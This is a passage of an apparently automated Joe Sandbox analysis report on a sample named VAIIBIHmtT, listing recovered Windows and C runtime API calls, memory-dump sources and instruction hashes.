                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402ACD
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00402ADA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFormatName$ModuleTime$AliasConsoleEnvironmentExesNamedNumberObjectPipeProcessShortValueVariable
                                                        • String ID:
                                                        • API String ID: 4163992861-0
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00409DE3
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409DF8
                                                        • UnhandledExceptionFilter.KERNEL32(00401B08), ref: 00409E03
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00409E1F
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00409E26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000061D3), ref: 0040621A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        APIs
                                                        • _malloc.LIBCMT ref: 00403598
                                                          • Part of subcall function 00403385: __FF_MSGBANNER.LIBCMT ref: 004033A8
                                                          • Part of subcall function 00403385: __NMSG_WRITE.LIBCMT ref: 004033AF
                                                          • Part of subcall function 00403385: HeapAlloc.KERNEL32(00000000,74DEDF91,00000001,00000000,00000000,?,00407FC8,74DEDFA0,00000001,74DEDFA0,?,004047A6,00000018,004562F0,0000000C,00404837), ref: 004033FC
                                                          • Part of subcall function 00405A8A: __getptd_noexit.LIBCMT ref: 00405A8A
                                                        • GetLastError.KERNEL32(00456288,00000010,00402B65,00000000,00000000), ref: 004036FD
                                                        • GetLastError.KERNEL32 ref: 0040378A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$AllocHeap__getptd_noexit_malloc
                                                        • String ID:
                                                        • API String ID: 2418675476-0
                                                        • Opcode ID: ebe4d2f4a6aa2f5db6c5fe1750b8a58926c4906cb4d1942648c70c98404e1576
                                                        • Instruction ID: 366ded926e0d4f8fef6445729b2551892b825c474475e8074114dc2f3c4b7eb5
                                                        • Opcode Fuzzy Hash: ebe4d2f4a6aa2f5db6c5fe1750b8a58926c4906cb4d1942648c70c98404e1576
                                                        • Instruction Fuzzy Hash: DD51B0F1D00614AADB317F659C4466F7E6CEB50766B208A3BF814BB2D1D73C8A018E9D
                                                        APIs
                                                        • _free.LIBCMT ref: 0077AFF1
                                                        • ___free_lconv_mon.LIBCMT ref: 0077AFFC
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A368
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A37A
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A38C
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A39E
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3B0
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3C2
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3D4
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3E6
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A3F8
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A40A
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A41C
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A42E
                                                          • Part of subcall function 0077A34B: _free.LIBCMT ref: 0077A440
                                                        • _free.LIBCMT ref: 0077B013
                                                        • _free.LIBCMT ref: 0077B028
                                                        • _free.LIBCMT ref: 0077B033
                                                        • _free.LIBCMT ref: 0077B055
                                                        • _free.LIBCMT ref: 0077B068
                                                        • _free.LIBCMT ref: 0077B076
                                                        • _free.LIBCMT ref: 0077B081
                                                        • _free.LIBCMT ref: 0077B0B9
                                                        • _free.LIBCMT ref: 0077B0C0
                                                        • _free.LIBCMT ref: 0077B0DD
                                                        • _free.LIBCMT ref: 0077B0F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 3658870901-0
                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction ID: 14fb5820862013e7fae15f5e845e84a3a52484ab10ef53c70bb9267ced859ed6
                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction Fuzzy Hash: 9B314831600604DEEF21AA78D849B6B77E8EF043A0F10C42EE46DDB151EF79AE51D720
                                                        APIs
                                                        • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 007613F6
                                                        • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00761413
                                                        • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00761479
                                                        • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0076148E
                                                        • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 007614A0
                                                        • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 007614CE
                                                        • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 007614D9
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00761505
                                                        • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00761515
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Base::ContextInternal$Work$Chore$AssociatedCompletionCreateCurrentException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThreadThrowTransferWait
                                                        • String ID: %D
                                                        • API String ID: 1102740027-2104738290
                                                        • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                        • Instruction ID: 6a91a358a6d9c7401e20deebdbeac17540b9c2f556300524ff15ca257da17516
                                                        • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                        • Instruction Fuzzy Hash: BE415B30A04244DADF15EBA4845D7ED7AA16F41301F9840A9EC476B293CF6C9A0ACBA1
                                                        APIs
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00755C09
                                                          • Part of subcall function 0075561A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 0075562E
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00755C32
                                                          • Part of subcall function 00753A94: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00753AB0
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00755C59
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00755B13
                                                          • Part of subcall function 00753AF8: __EH_prolog3_GS.LIBCMT ref: 00753AFF
                                                          • Part of subcall function 00753AF8: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00753B47
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00755B34
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00755B6B
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00755BAE
                                                        • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00755CA1
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00755CC5
                                                        • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00755CD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Manager::Resource$Affinity$ApplyRestrictions$Information$Topology$CaptureHardwareProcess$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalProcessorRestriction::
                                                        • String ID:
                                                        • API String ID: 2324067391-0
                                                        • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction ID: 6c83d71a5246b26546f4a7c9d1ff53dea0944e33c758517a602258056bf3e20f
                                                        • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction Fuzzy Hash: 4A619C71900702DFDB18CF64E8E66ADB7A1FB04303F24803DE84697292C7B9A949CB58
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction ID: 28ac3cc3da3b00e9f8ddc1ee86bf18f03929b8068543c3bcc99659d96a2ac354
                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction Fuzzy Hash: E911A476100508EFCF01EF54D856CD93BA5EF043A0B11D0A9FA0C8B222EA75DF51AB80
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: C
                                                        • API String ID: 269201875-1037565863
                                                        • Opcode ID: e4287537c326013098f7752669636024e1d85bc84a09542dbdc65a1d0fc5e3df
                                                        • Instruction ID: 3880dcaacd5beabec7441526b5502c7ec2b1d3163edd44ec9bfe7e728fc2e605
                                                        • Opcode Fuzzy Hash: e4287537c326013098f7752669636024e1d85bc84a09542dbdc65a1d0fc5e3df
                                                        • Instruction Fuzzy Hash: 52B12675A0121ADFDF24DF18C888AADB7B4FB08354F5085EAE94DA7250E775AE90CF40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                        • Instruction ID: 3881599d614559af831b14b2da991b042893cb6bb90efcca848575dcaeb6ea7c
                                                        • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                        • Instruction Fuzzy Hash: 6461D271904205EFEF20DF68C842B9EBBF5EB85360F15C16AE948EB241EB749D41CB51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _strlen$H_prolog3_
                                                        • String ID: 4#E$i
                                                        • API String ID: 2786647812-2480119546
                                                        • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                        • Instruction ID: 7b0be22f681673ac4fcb2497a05e3eae954b939d43930170b6882cf7b92f3419
                                                        • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                        • Instruction Fuzzy Hash: 6D51E530C00384DBD721DFA4ED497ADBB74FF2A306F045225E841A6173EBB89A85C769
                                                        APIs
                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00765226
                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0076523B
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0076524A
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00765258
                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 007652CE
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0076530E
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0076531C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleProxy::ResetSuspendThread
                                                        • String ID:
                                                        • API String ID: 1615543006-0
                                                        • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction ID: 504631a24436fee4e3bc6b41df0fd5f14e3dcccb91c9ae74dc4c9580fb903165
                                                        • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction Fuzzy Hash: 8531F475A00614DFCF04EF68C895AADB3B5FF54310F204569ED12A7282DB78EE05DB90
                                                        APIs
                                                        • _SpinWait.LIBCONCRT ref: 0075B8AB
                                                          • Part of subcall function 007518E1: _SpinWait.LIBCONCRT ref: 007518F9
                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0075B8BF
                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0075B8F1
                                                        • List.LIBCMT ref: 0075B974
                                                        • List.LIBCMT ref: 0075B983
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                        • String ID: 6+A
                                                        • API String ID: 3281396844-2819411039
                                                        • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                        • Instruction ID: e7d1036a4f78e63a68df7777c66706ccd7f9b9cb5903e37aa7abfc3aef3f6a89
                                                        • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                        • Instruction Fuzzy Hash: 00315532E0165ADFCB14EFA4C5956EDB7B0BF04306F14406ADD416B282DBB97E08CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction ID: be3c4be0e27d2f79b5bc906b510cea28b17cddf4df82307d659ab148ab6e2f04
                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction Fuzzy Hash: 80111F72540B04FAED21B7B0CD0BFCF779CAF44790F42C829B69E6A052DA6DB6049B51
                                                        APIs
                                                        • __getptd.LIBCMT ref: 004091D0
                                                          • Part of subcall function 00406C6B: __getptd_noexit.LIBCMT ref: 00406C6E
                                                          • Part of subcall function 00406C6B: __amsg_exit.LIBCMT ref: 00406C7B
                                                        • __amsg_exit.LIBCMT ref: 004091F0
                                                        • __lock.LIBCMT ref: 00409200
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0040921D
                                                        • InterlockedIncrement.KERNEL32(007B2CE0), ref: 00409248
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                        • String ID: ,{
                                                        • API String ID: 4271482742-450320262
                                                        • Opcode ID: 0e8d2816f694c4c46d90cb8f16ffb96b1a4c50a28fff4123f355a5bd6d552678
                                                        • Instruction ID: dcd903aad5bc4b3d0ec1472a1e987bc59788f9cdbed50114020c810e999c6897
                                                        • Opcode Fuzzy Hash: 0e8d2816f694c4c46d90cb8f16ffb96b1a4c50a28fff4123f355a5bd6d552678
                                                        • Instruction Fuzzy Hash: 23015231A05711BBE720AF66984975E7360AB40755F05807BE8047B6E3C73C9D41DB9D
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: h|aE
                                                        • API String ID: 269201875-4167925309
                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                        • Instruction ID: 17df4946aadb0381153723248516eb70858ed91b4006e33315a234035d6f8972
                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                        • Instruction Fuzzy Hash: 7DF06232505A00FB9E25EB54E48AC1E73D9FA407A0B658919F00CDB612DF39FD818B57
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID:
                                                        • API String ID: 4189289331-0
                                                        • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                        • Instruction ID: e5b94f1ad39255b1aa617dfe13f3643fce4087f4b6fbabb3ae1ca365165518e7
                                                        • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                        • Instruction Fuzzy Hash: 26510A7A500205EBDF205B5CCC49EAE77A9EF49370F248219FC1BA6182EB3DDD008675
                                                        APIs
                                                        • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 007637AA
                                                        • SafeSQueue.LIBCONCRT ref: 007637C3
                                                        • Concurrency::location::_Assign.LIBCMT ref: 00763883
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007638A4
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 007638B2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_Exception@8QueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                        • String ID:
                                                        • API String ID: 1854678904-0
                                                        • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                        • Instruction ID: a96d3dfa591f85090d869d99b0b5d21e0668c04fd3d3869f5e1f410c727a9fcb
                                                        • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                        • Instruction Fuzzy Hash: 18311571600612DFCB25EF68C485AAAB7B0FF04711F144559ED1B9B292DB78EE09CBD0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                        • String ID:
                                                        • API String ID: 1687354797-0
